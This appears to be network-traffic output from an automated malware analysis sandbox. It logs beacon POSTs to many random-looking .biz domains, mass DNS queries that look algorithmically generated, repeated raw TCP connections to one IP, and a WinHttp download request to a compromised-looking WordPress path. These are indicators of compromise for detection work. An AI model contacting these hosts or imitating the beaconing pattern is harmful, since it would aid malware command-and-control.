Source: global traffic	HTTP traffic detected: POST /qpbiwob HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /hhfkorwt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uack HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /rbv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /epwoomrcoonof HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /btmiljbhjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /kwpvpynqhxqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ectmddoihjyrxjp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /jdoddcjkmiicjrmw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /nv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jwkoeoqns.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802
Source: global traffic	HTTP traffic detected: POST /bdvsq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120
Source: unknown	TCP traffic detected without corresponding DNS query: 62.60.190.120

Source: global traffic

HTTP traffic detected: GET /wp-admin/233_Jwsmvmdweya HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: chichometextiles.com

Source: global traffic	DNS traffic detected: DNS query: chichometextiles.com
Source: global traffic	DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic	DNS traffic detected: DNS query: ssbzmoy.biz
Source: global traffic	DNS traffic detected: DNS query: cvgrf.biz
Source: global traffic	DNS traffic detected: DNS query: npukfztj.biz
Source: global traffic	DNS traffic detected: DNS query: przvgke.biz
Source: global traffic	DNS traffic detected: DNS query: zlenh.biz
Source: global traffic	DNS traffic detected: DNS query: knjghuig.biz
Source: global traffic	DNS traffic detected: DNS query: uhxqin.biz
Source: global traffic	DNS traffic detected: DNS query: anpmnmxo.biz
Source: global traffic	DNS traffic detected: DNS query: lpuegx.biz
Source: global traffic	DNS traffic detected: DNS query: vjaxhpbji.biz
Source: global traffic	DNS traffic detected: DNS query: xlfhhhm.biz
Source: global traffic	DNS traffic detected: DNS query: ifsaia.biz
Source: global traffic	DNS traffic detected: DNS query: saytjshyf.biz
Source: global traffic	DNS traffic detected: DNS query: vcddkls.biz
Source: global traffic	DNS traffic detected: DNS query: fwiwk.biz
Source: global traffic	DNS traffic detected: DNS query: tbjrpv.biz
Source: global traffic	DNS traffic detected: DNS query: deoci.biz
Source: global traffic	DNS traffic detected: DNS query: gytujflc.biz
Source: global traffic	DNS traffic detected: DNS query: qaynky.biz
Source: global traffic	DNS traffic detected: DNS query: bumxkqgxu.biz
Source: global traffic	DNS traffic detected: DNS query: dwrqljrr.biz
Source: global traffic	DNS traffic detected: DNS query: nqwjmb.biz
Source: global traffic	DNS traffic detected: DNS query: ytctnunms.biz
Source: global traffic	DNS traffic detected: DNS query: myups.biz
Source: global traffic	DNS traffic detected: DNS query: oshhkdluh.biz
Source: global traffic	DNS traffic detected: DNS query: yunalwv.biz
Source: global traffic	DNS traffic detected: DNS query: jpskm.biz
Source: global traffic	DNS traffic detected: DNS query: lrxdmhrr.biz
Source: global traffic	DNS traffic detected: DNS query: wllvnzb.biz
Source: global traffic	DNS traffic detected: DNS query: gnqgo.biz
Source: global traffic	DNS traffic detected: DNS query: jhvzpcfg.biz
Source: global traffic	DNS traffic detected: DNS query: acwjcqqv.biz
Source: global traffic	DNS traffic detected: DNS query: lejtdj.biz
Source: global traffic	DNS traffic detected: DNS query: vyome.biz
Source: global traffic	DNS traffic detected: DNS query: yauexmxk.biz
Source: global traffic	DNS traffic detected: DNS query: iuzpxe.biz
Source: global traffic	DNS traffic detected: DNS query: sxmiywsfv.biz
Source: global traffic	DNS traffic detected: DNS query: vrrazpdh.biz
Source: global traffic	DNS traffic detected: DNS query: ftxlah.biz
Source: global traffic	DNS traffic detected: DNS query: typgfhb.biz
Source: global traffic	DNS traffic detected: DNS query: esuzf.biz
Source: global traffic	DNS traffic detected: DNS query: gvijgjwkh.biz
Source: global traffic	DNS traffic detected: DNS query: qpnczch.biz
Source: global traffic	DNS traffic detected: DNS query: brsua.biz
Source: global traffic	DNS traffic detected: DNS query: dlynankz.biz
Source: global traffic	DNS traffic detected: DNS query: oflybfv.biz
Source: global traffic	DNS traffic detected: DNS query: yhqqc.biz
Source: global traffic	DNS traffic detected: DNS query: mnjmhp.biz
Source: global traffic	DNS traffic detected: DNS query: opowhhece.biz
Source: global traffic	DNS traffic detected: DNS query: zjbpaao.biz
Source: global traffic	DNS traffic detected: DNS query: jdhhbs.biz
Source: global traffic	DNS traffic detected: DNS query: mgmsclkyu.biz
Source: global traffic	DNS traffic detected: DNS query: warkcdu.biz
Source: global traffic	DNS traffic detected: DNS query: gcedd.biz
Source: global traffic	DNS traffic detected: DNS query: jwkoeoqns.biz
Source: global traffic	DNS traffic detected: DNS query: xccjj.biz
Source: global traffic	DNS traffic detected: DNS query: hehckyov.biz
Source: global traffic	DNS traffic detected: DNS query: rynmcq.biz
Source: global traffic	DNS traffic detected: DNS query: uaafd.biz
Source: global traffic	DNS traffic detected: DNS query: eufxebus.biz
Source: global traffic	DNS traffic detected: DNS query: pwlqfu.biz
Source: global traffic	DNS traffic detected: DNS query: rrqafepng.biz
Source: global traffic	DNS traffic detected: DNS query: ctdtgwag.biz
Source: global traffic	DNS traffic detected: DNS query: tnevuluw.biz
Source: global traffic	DNS traffic detected: DNS query: whjovd.biz
Source: global traffic	DNS traffic detected: DNS query: gjogvvpsf.biz
Source: global traffic	DNS traffic detected: DNS query: reczwga.biz
Source: global traffic	DNS traffic detected: DNS query: bghjpy.biz
Source: global traffic	DNS traffic detected: DNS query: damcprvgv.biz
Source: global traffic	DNS traffic detected: DNS query: ocsvqjg.biz
Source: global traffic	DNS traffic detected: DNS query: ywffr.biz
Source: global traffic	DNS traffic detected: DNS query: ecxbwt.biz
Source: global traffic	DNS traffic detected: DNS query: pectx.biz
Source: global traffic	DNS traffic detected: DNS query: zyiexezl.biz
Source: global traffic	DNS traffic detected: DNS query: banwyw.biz
Source: global traffic	DNS traffic detected: DNS query: muapr.biz
Source: global traffic	DNS traffic detected: DNS query: wxgzshna.biz
Source: global traffic	DNS traffic detected: DNS query: zrlssa.biz
Source: global traffic	DNS traffic detected: DNS query: jlqltsjvh.biz
Source: global traffic	DNS traffic detected: DNS query: xyrgy.biz
Source: global traffic	DNS traffic detected: DNS query: htwqzczce.biz
Source: global traffic	DNS traffic detected: DNS query: kvbjaur.biz
Source: global traffic	DNS traffic detected: DNS query: uphca.biz
Source: global traffic	DNS traffic detected: DNS query: fjumtfnz.biz
Source: global traffic	DNS traffic detected: DNS query: hlzfuyy.biz
Source: global traffic	DNS traffic detected: DNS query: rffxu.biz
Source: global traffic	DNS traffic detected: DNS query: cikivjto.biz
Source: global traffic	DNS traffic detected: DNS query: qncdaagct.biz
Source: global traffic	DNS traffic detected: DNS query: shpwbsrw.biz
Source: global traffic	DNS traffic detected: DNS query: cjvgcl.biz
Source: global traffic	DNS traffic detected: DNS query: neazudmrq.biz
Source: global traffic	DNS traffic detected: DNS query: pgfsvwx.biz
Source: global traffic	DNS traffic detected: DNS query: aatcwo.biz
Source: global traffic	DNS traffic detected: DNS query: kcyvxytog.biz
Source: global traffic	DNS traffic detected: DNS query: nwdnxrd.biz
Source: global traffic	DNS traffic detected: DNS query: ereplfx.biz
Source: global traffic	DNS traffic detected: DNS query: ptrim.biz
Source: global traffic	DNS traffic detected: DNS query: znwbniskf.biz

Source: unknown

HTTP traffic detected: POST /xvpanbchxym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 802

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:23:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:23:56 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Fri, 01 Nov 2024 07:24:04 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
